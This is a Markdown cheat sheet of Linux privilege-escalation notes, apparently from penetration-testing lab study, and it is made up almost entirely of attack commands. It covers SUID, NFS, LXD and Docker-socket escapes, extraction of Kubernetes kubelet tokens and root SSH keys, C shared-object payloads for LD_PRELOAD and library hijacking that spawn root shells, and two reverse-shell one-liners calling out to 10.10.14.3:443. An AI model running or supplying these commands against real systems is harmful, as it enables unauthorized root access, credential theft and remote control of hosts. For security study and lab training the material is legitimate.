# Linux Privilege Escalation

## Linux Privilege Escalation 

### Enumeration

#### General command

* `whoami`
* `id`
* `hostname`
* `ip -a` of `ifconfig`
* `sudo -l`

#### OS Related

* OS Version
  * `cat /etc/os-release`
* Kernel Version
  * `uname -r`
  * `uname -a`
  * `cat /proc/version`

#### Users

* LoggedIn User
  * `w`
  * `who`
  * `lastlog`
* Home Directory Content
  * `ls /home`
  * `ls -la /home/<username>/`
  * `ls -l ~/.ssh`
* Environment
  * `echo $PATH`
  * `env`
* Shell Installed
  * `cat /etc/shells`
* Bash History
  * \`history
* Sudo Priviliges
  * `sudo -l`
* Users
  * `cat /etc/passwd`
  * `cat /etc/group`
  * `getent group <gruppo>`

#### Interesting Files

* Configuration Files
  * `.conf` `.config` `.xml` `.bak`
  * `find / -type f \( -name *.conf -o -name *.config \) -exec ls -l {} \; 2>/dev/null`
  * `find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null`
* Scripts File
  * `find / -type f -name "*.sh" 2>/dev/null | grep -v "src\|snap\|share"`
* Readable Shadow File
  * `/etc/shadow`
* Files & Dir
  * `find / -type f -name ".*" -exec ls -l {} \; 2>/dev/null`
  * `find / -type d -name ".*" -ls 2>/dev/null`
  * `ls -l /tmp /var/tmp /dev/shm`
* Finding History Files
  * `find / -type f \( -name *_hist -o -name *_history \) -exec ls -l {} \; 2>/dev/null`
* Find Writable
  * Directories `find / -path /proc -prune -o -type d -perm -o+w 2>/dev/null`
  * Files `find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null`

#### Services & Internal Enumeration

* Cron Jobs
  * `ls -la /etc/cron.daily/`
* File System and Additional Drives
  * `lsblk` -> drive
  * `lpstat` -> printer
  * `cat /etc/fstab` -> drive/file system
  * `df -h` -> mounted file system
  * `cat /etc/fstab | grep -v "#" | column -t` -> unmounted file system
* Network
  * `ip a`
  * `route` - `netstat -r`
  * `arp -a`
  * `cat /etc/resolv.conf`
  * `cat /etc/hosts`
* Binaries
  * `ls -l /bin /usr/bin/ /usr/sbin/`
* Hardware
  * `lscpu`
* Running Services
  * `find /proc -name cmdline -exec cat {} \; 2>/dev/null | tr " " "\n"`
* List Current Process
  * `ps aux | grep <user>/root`
  * `ps au`
* Sudo Version
  * `sudo -V`
* Installed Packages and Version
  * `apt list --installed | tr "/" " " | cut -d" " -f1,3 | sed 's/[0-9]://g' | tee -a installed_pkgs.list`

### Misconfiguration

#### Path Abuse

* Check `PATH env`

#### Wildcard Abuse

* Check if `*, ?, [], ~, -`

#### `SETUID` adn `SETGID` permissions

* `find "$DIRECTORY" -perm /4000`
* `find "$DIRECTORY" -perm /2000`
* `find "$DIRECTORY" -perm /u=s,g=s`
* `find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null`
* `find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null`

#### Sudo Right Abuse

* `sudo -l`

#### Weak NFS

* `showmount -e 10.129.2.12`
* `cat /etc/exports`
* Copy shell to /mnt and add SETUID
  * `cp shell /mnt`
  * `chmod u+s /mnt/shell`
  * `sudo mount -t nfs 10.129.2.12:/tmp /mnt`

#### Hijacking Tmux Session

* Check `tmux` process running as a privileged user (`dev` group onlu )
  * `ps aux | grep tmux`
  * `ls -la /shareds`
  * `tmux -S /shareds`

### Capabilities

* `CAP_SETUID`
* `CAP_SETGID`
* `CAP_SYS_ADMIN`
* Enumerate
  * `find /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin -type f -exec getcap {} \;`

### Privileged Groups

* `LXC/LXD`
  * Staring privilege container with privileged=true
  * `lxd init`
  * `lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine`
  * \`lxc init alpine r00t -c security.privileged=true
  * `lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true`
  * `lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true`
  * `lxc start r00t`
    * `lxc exec r00t /bin/sh`
* `Docker`
  * see Docker Abuse
* `Disk`
* `ADM`

### Service and process Abuse

#### Cron Job Abuse

* `/etc/cron.d`
* `ls -la /etc/cron.daily/`
* Find writable file
  * `find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null`
* Enumerate running process
  * `./pspy64 -pf -i 1000`

#### Docker Abuse

* `Docker`
  * Same as Linux
  * Intereseting `docker.sock` - `/var/run/docker.sock`
    * `/tmp/docker -H unix:///app/docker.sock ps`
    * `/tmp/docker -H unix:///app/docker.sock run --rm -d --privileged -v /:/hostsystem main_app`
    * `/tmp/docker -H unix:///app/docker.sock ps`
    * `/tmp/docker -H unix:///app/docker.sock exec -it 7ae3bcc818af /bin/bash`
    * `docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it ubuntu chroot /mnt bash`

#### Kubernetes

* **Each pod functions as a separate virtual machine on a node, complete with its own IP, hostname, and other details**.
* Control Plane -> master node
  * TCP etcd `2379`, `2380`
  * API Server `6443`
  * Scheduler `10251`
  * Controller manager `10252`
  * Kubelet API `10250`
  * Read-Only Kubelet API `10255`
* Minion -> Worker Noded
* API Server Interaction
  * `curl https://10.129.10.11:6443 -k`
  * Extracting Pod
    * `curl https://10.129.10.11:10250/pods -k | jq .`
  * Extracting pod
    * `kubeletctl -i --server 10.129.10.11 pods`
  * Available Commands
    * `kubeletctl -i --server 10.129.10.11 scan rce`
  * Execute Command
    * `$ kubeletctl -i --server 10.129.10.11 exec "id" -p nginx -c nginx`
  * Extracting Token
    * `kubeletctl -i --server 10.129.10.11 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx | tee -a k8.token`
  * Extracting Certificates
    * `kubeletctl --server 10.129.10.11 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt" -p nginx -c nginx | tee -a ca.crt`
  * List Privileges
    * `export token=`cat k8.token\`
    * `kubectl --token=$token --certificate-authority=ca.crt --server=https://10.129.10.11:6443 auth can-i --list`
  * Creating new pod
    * `kubectl --token=$token --certificate-authority=ca.crt --server=https://10.129.96.98:6443 apply -f privesc.yaml`
    * `kubectl --token=$token --certificate-authority=ca.crt --server=https://10.129.96.98:6443 get pods`
  * Extracting root ssh key
    * `kubeletctl --server 10.129.10.11 exec "cat /root/root/.ssh/id_rsa" -p privesc -c privesc`

#### LogRotate

* `logrotate`
* `cat /etc/logrotate.conf`
* `sudo cat /var/lib/logrotate.status`
* `ls /etc/logrotate.d/`
* `cat /etc/logrotate.d/dpkg`
* For exploiting
  * write permission on the log files
  * run as root
  * vulnerable version e.g., 3.8.6, 3.11.0, 3.15.0, 3.18.0
* Tools - <https://github.com/whotwagner/logrotten>

### Shared Library

#### General Information

* Static libraries `.a`
  * Compiled and part of the program
* dynamically linked shared object libraries `.so`
  * Can be altered
* Specify location of dynamic libraries
  * when compiling `-rpath` or `-rpath-link`
  * using env `LD_RUN_PATH` or `LD_LIBRARY_PATH`
  * placing in `/lib` or `/usr/lib`
  * Changing `/etc/ld.so.conf`
  * `LD_PRELOAD` - load library before executing binary
* `ldd binary`

#### Exploiting `LD_PRELOAD`

* Compile a `so object`

```c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
	unsetenv("LD_PRELOAD");
	setgid(0);
	setuid(0);
	system("/bin/bash");
}

```

* `gcc -fPIC -shared -o root.so root.c -nostartfiles`
* `sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart`

#### Shared Object Hijacking

* Searching non standard library
  * use `ldd <binary>`
* Find `RUNPATH` configuration (load shared libraries from custom location)
  * `readelf -d payroll | grep PATH`
* Before create a new library find function name called by binary
  * Running program and see undefined symbol
  * Create malicious shared object

    ```
    	#include<stdio.h> #include<stdlib.h> void dbquery() {
        printf("Malicious library loaded\n");
        setuid(0);
        system("/bin/sh -p");
    ```
* `gcc src.c -fPIC -shared -o /development/libshared.so`

#### Python Library Hijackin

* Wrong write permission
  * Change content library where is used

    * ```
      ```

    ```python
    #!/usr/bin/env python3 
    import psutil
    available_memory = psutil.virtual_memory()
    ```

    * `grep -r "def virtual_memory"`
* Library Path
  * `python3 -c 'import sys; print("\n".join(sys.path))'`
  * module imported from target
  * write permission on specific module or on higher module`ls -al <path>`
* `PYTHONPATH` environment variable
  * `PYTHONPATH` is an environment variable that indicates what directory (or directories) Python can search for modules to import.
  * `sudo PYTHONPATH=/newPATHWithLib /usr/bin/python3 ./mem_status.py`

### Various

#### Passive Traffic Capture

* net-creds - <https://github.com/DanMcInerney/net-creds>
* PCredz - <https://github.com/lgandx/PCredz>

### 0-day & Kernel Exploit

* Sudo
* Polkit
* DirtyPipe - DirtyCow -
* Netfilter

### Rev Shell

* `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 443 >/tmp/f`
* `bash -i >& /dev/tcp/10.10.14.3/443 0>&1`

### Tools

* LinEnum - [LinEnum](https://github.com/rebootuser/LinEnum)
* [LinPeas](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS)
* strace - for get creds
* [pspy](https://github.com/DominicBreuker/pspy)
* [logrottten](https://github.com/whotwagner/logrotten)
* [net-creds](https://github.com/DanMcInerney/net-creds)
* [PCredz](https://github.com/lgandx/PCredz)
* `readelf`
* `ldd`

### Resources

* [Escaping Restricted Shell](https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#escaping-from-restricted-shells)
* [SETUID and SETGID](https://linuxconfig.org/how-to-use-special-permissions-the-setuid-setgid-and-sticky-bits)
* [GTFObins](https://gtfobins.github.io/)